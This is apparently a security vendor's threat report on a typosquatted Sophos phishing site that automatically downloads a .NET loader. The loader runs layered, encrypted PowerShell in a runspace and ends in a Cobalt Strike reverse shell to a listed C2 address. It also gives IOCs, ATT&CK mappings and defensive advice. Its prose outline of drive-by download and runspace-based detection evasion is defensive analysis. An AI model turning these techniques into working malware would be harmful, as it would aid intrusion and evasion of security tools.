Key Takeaways
- Cyble Research & Intelligence Labs (CRIL) encountered a typosquatted domain of Sophos.
- The phishing site contains a malware payload embedded within its source code.
- When a user visits this site, the malware is automatically downloaded to the victim’s machine without requiring any user interaction.
- The phishing website distributes a malicious .NET loader containing an embedded PowerShell script.
- To execute this PowerShell script, a runspace is utilized, preventing the creation of new PowerShell processes and facilitating the dynamic execution of subsequent PowerShell scripts.
- This script delivers a Cobalt Strike beacon, establishing a reverse TCP shell with an IP address encoded in hexadecimal format.
Cyble Research & Intelligence Labs (CRIL) came across a typosquatted domain of Sophos, “sopbos[.]com”, using a VirusTotal search. The phishing site impersonates the installation of the Sophos Home.
The initial infection vector is unclear at this time as we could not trace how users would be directed to this phishing site. Based on the phishing site, we suspect users might have reached it via a phishing email or ads containing a link asking them to install Sophos Home. Upon clicking on the link, this site initiates automatic payload downloads without requiring any user interaction.
The figure below shows the malicious site impersonating Sophos.
The downloaded file is a malicious .Net loader that contains an embedded PowerShell script. Notably, this PowerShell script is executed within a runspace, preventing the creation of new PowerShell processes and enabling on-the-fly execution of subsequent scripts. Ultimately, a Cobalt Strike beacon is deployed that establishes a reverse TCP shell.
Technical Analysis
The phishing site is mainly comprised of JavaScript code. Upon visiting this site, the JavaScript code is triggered, initiating the download of a malicious file onto the victim’s device. Once the site is loaded, the HTML code displays an image disguised as the Sophos web page to any visitors.
The figure below shows the code of the phishing site.
The JavaScript code executes automatically once users visit the phishing site. It begins by decoding a Base64-encoded executable and saving it in a blob. It then takes a conditional approach based on the user’s web browser to download an executable file name “SophosInstall..exe”.
For Internet Explorer users, the blob is directly saved or opened using the window.navigator.msSaveOrOpenBlob method. In contrast, for users on other modern browsers, the code dynamically generates an anchor element, links it to the blob’s URL, and simulates a click event using the click() method on the anchor to initiate the download. Using this method, the download process is initiated automatically as soon as the JavaScript code is executed, without requiring any user interaction.
The figure below shows the code for downloading the file.
Payload
The downloaded file is a 64-bit .Net binary that, upon execution, uses a runspace to execute the embedded PowerShell code. The runspace is achieved by the malware using the RunspaceFactory.CreateRunspace () method as shown in Figure 4. This method allows the execution of the PowerShell script without requiring it to be saved on the disk or creating a new process. Consequently, it minimizes the occurrence of PowerShell events, reducing the likelihood of detection by security solutions.
This executable can also run with specific command line parameters. It examines whether any of the provided optional arguments have been supplied and adjusts the binary’s behavior accordingly.
| Command Line Argument | Description | Case Sensitive |
| -wait | Prints “Hit any key to exit…” | Yes |
| -extract | Writes the decoded PowerShell to a file | No |
| -end | Stores the position at which this argument is passed | Yes |
| -debug | launches the debugger using System.Diagnostics.Debugger.Launch() | Yes |
Following this, the executable decodes the Base64-encoded PowerShell script present within it and loads it into the PowerShell runspace session using the AddScript() method. Subsequently, it initiates the script’s execution using the BeginInvoke() method.
The figure below illustrates the encoded PowerShell script.
Now, the Powershell script is executed, which decodes an additional Base64-encoded string and then performs AES decryption on the decoded data, followed by decompression. The resulting data is converted to a UTF-8 encoded string. Finally, it executes another PowerShell script extracted from this processed data using the Invoke-Expression cmdlet. This script, shown in Figure 6, essentially serves as a method to hide and execute PowerShell code for the next stage.
While both scripts follow a similar type of decryption, decompression, and script execution, they employ different decryption keys, initialization vectors (IVs), and compression algorithms. The first script uses the Deflate algorithm, while the second script utilizes the Gzip stream for decompression.
The figure below shows the comparison between scripts.
The second PowerShell script decrypts and executes the final PowerShell script. The final PowerShell script is a Cobalt Strike beacon. It sets up a reverse shell, where a remote attacker can send commands to the machine, execute them, and receive responses from the compromised machine.
The final PowerShell script begins with the command “Start – Process $PSHOME powershell.exe” to launch a PowerShell instance, causing it to execute through this process instead of within a runspace, as illustrated in the figure below.
The final PowerShell script establishes a network connection to a remote server represented by the IP address and port provided in hexadecimal format, as mentioned below.
- 0x6247e8df: 98[.]71.232[.]223
- 0x1f90: 8080
The script then creates a data stream and reads incoming data in chunks. It converts this received data from bytes to text, executes it using iex (Invoke-Expression), captures the output, appends a custom string, and sends it back to the remote server. This process continues in a loop until no more data is received, after which the network connection is closed.
As the C&C server is down, we were not able to investigate further on this.
The figure below shows the Cobalt Strike beacon.
Conclusion
In the past, Cobalt Strike has been employed by Threat Actors (TAs) to distribute various malware payloads, including ransomware and Remote Access Trojans (RATs). Unfortunately, due to the C&C (Command and Control) server being inaccessible, we were unable to examine the specific malware payload that the TAs intended to deploy. However, it is worth noting that in this campaign, a .Net loader was utilized to execute PowerShell scripts through runspace. Though this is not a new technique, it enhances the malware’s evasiveness by executing scripts without spawning new processes or saving them to the disk, thereby reducing the possibility of detection.
Our Recommendations
- Deploy Cobalt Strike-specific signatures and rules for your network monitoring solution.
- Implement application whitelisting to restrict the execution of PowerShell scripts to only approved and trusted scripts or locations.
- Block the malicious IOCs shared in the table below.
MITRE ATT&CK® Techniques
| Tactic | Technique ID | Procedure |
| Initial Access (TA0001) | Phishing (T1566) | This malware reaches users via phishing sites. |
| Execution (TA0002) | User Execution (T1204) | The user needs to manually execute the malicious file downloaded from the phishing site. |
| Execution (TA0002) | Command and Scripting Interpreter (T1059) | PowerShell scripts are used to execute the Cobalt Strike beacon. |
| Defense Evasion (TA0005) | Indirect Command Execution (T1202) | PowerShell commands are executed using a malicious executable. |
| Defense Evasion (TA0005) | Masquerading (T1036) | The downloaded file is disguised as a Sophos installer. |
| Defense Evasion (TA0005) | Deobfuscate/Decode Files or Information(T1140) | PowerShell scripts are deobfuscated and decoded to get the Cobalt Strike beacon. |
| Command and Control (TA0011) | Non-Application Layer Protocol (T1095) | TCP is used by the Cobalt Strike beacon to interact with the C&C server. |
Indicators of Compromise (IOCs)
| Indicators | Indicator Type | Description |
| c974ffe23d57ec909ef26b55f202047e ec6da5616d6b3b3269fababe104bfe04f2828717 067c95ad074afd8993281b02f74d0f257fb312943da0887355da652afb54c0ab | MD5 SHA1 SHA256 | SophosInstall..exe |
| sopbos[.]com | Domain | Phishing Site |
| 98[.]71.232[.]223 | IP | C&C |
Related
Source: https://cyble.com/blog/covert-delivery-of-cobalt-strike-beacon-via-sophos-phishing-website/